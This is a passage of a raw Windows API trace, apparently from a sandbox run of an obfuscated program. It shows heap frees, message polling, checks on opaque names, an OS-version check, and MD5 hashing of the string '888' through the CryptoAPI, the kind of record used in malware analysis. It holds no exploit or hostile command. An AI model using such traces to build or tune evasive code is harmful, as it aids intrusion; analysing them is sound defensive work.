hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab410 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab308 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0213.759] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0213.759] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0213.759] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab248 | out: hHeap=0x2af0000) returned 1 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e68 | out: hHeap=0x2af0000) returned 1 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.760] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0213.760] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.760] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0213.760] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0213.760] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77df0 | out: hHeap=0x2af0000) returned 1 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0213.760] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0213.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab170 | out: hHeap=0x2af0000) returned 1 [0213.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0213.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0213.761] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed80 | out: hHeap=0x2af0000) returned 1 [0213.761] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0213.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0213.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0213.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0213.761] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0213.761] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.761] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.761] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.761] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.761] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0213.761] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0213.761] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.761] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.761] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0213.761] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.761] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0213.761] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0213.761] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0213.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f6fc0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0213.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0213.762] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f6ea0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0213.762] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7be68) returned 1 [0213.763] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.763] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.763] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0213.763] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.763] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0213.763] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.763] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.763] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.763] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.763] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.763] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.763] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0213.763] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.763] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0213.763] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.763] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.763] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0213.763] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0213.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.763] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0213.763] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0213.763] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.764] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0213.764] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.764] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.764] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.764] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.764] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.764] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.764] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.764] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0213.764] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.764] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0213.764] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.764] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.764] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0213.764] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.764] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0213.764] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.765] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0213.766] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.766] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.766] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0213.766] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.766] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0213.766] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.766] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.766] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0213.766] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0213.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.766] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.766] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.766] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.766] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.766] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.766] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.766] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0213.766] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.766] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0213.766] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.766] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.766] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.766] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0213.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aab530, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0213.767] CryptCreateHash (in: hProv=0xa7be68, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0213.767] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.767] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.767] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.767] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0213.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a726a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0213.767] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0213.767] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0213.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72708, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0213.767] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.767] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.767] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.767] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.767] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.767] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.767] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0213.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0213.767] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aab680, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0213.767] CryptHashData (hHash=0x9e21f8, pbData=0x2a72738, dwDataLen=0x3, dwFlags=0x1) returned 1 [0213.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.768] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0213.768] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0213.768] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.768] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0213.768] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.768] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.768] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0213.768] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0213.768] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0213.768] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 